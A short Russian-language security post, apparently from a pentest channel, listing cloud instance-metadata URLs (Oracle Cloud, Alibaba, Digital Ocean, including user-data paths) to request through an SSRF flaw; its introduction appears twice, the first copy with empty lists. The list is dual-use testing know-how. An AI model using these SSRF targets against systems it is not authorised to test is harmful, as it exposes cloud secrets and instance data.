☁️ Адреса облачных ресурсов, для обращения через SSRF
Когда вы нашли SSRF, то следующий ваш шаг, это попытаться получить доступ к внутренним ресурсам и найти там что-то ценное.
И если для AWS довольно много примеров и статей (если не в курсе, смотри тут или тут), то что делать с другими облачными ресурсами? Ниже приведён список интересных URL адресов для Oracle Cloud, Alibaba и Digital Ocean.
Oracle Cloud:
Alibaba:
Digital Ocean:
#web #ssrf #cloud
Когда вы нашли SSRF, то следующий ваш шаг, это попытаться получить доступ к внутренним ресурсам и найти там что-то ценное.
И если для AWS довольно много примеров и статей (если не в курсе, смотри тут или тут), то что делать с другими облачными ресурсами? Ниже приведён список интересных URL адресов для Oracle Cloud, Alibaba и Digital Ocean.
Oracle Cloud:
http://192.0.0.192/latest/
http://192.0.0.192/latest/user-data/
http://192.0.0.192/latest/meta-data/
http://192.0.0.192/latest/attributes/
Alibaba:
http://100.100.100.200/latest/meta-data/
http://100.100.100.200/latest/meta-data/instance-id
http://100.100.100.200/latest/meta-data/image-id
Digital Ocean:
http://169.254.169.254/metadata/v1.json
http://169.254.169.254/metadata/v1/
http://169.254.169.254/metadata/v1/id
http://169.254.169.254/metadata/v1/user-data
http://169.254.169.254/metadata/v1/hostname
http://169.254.169.254/metadata/v1/region
http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/address
#web #ssrf #cloud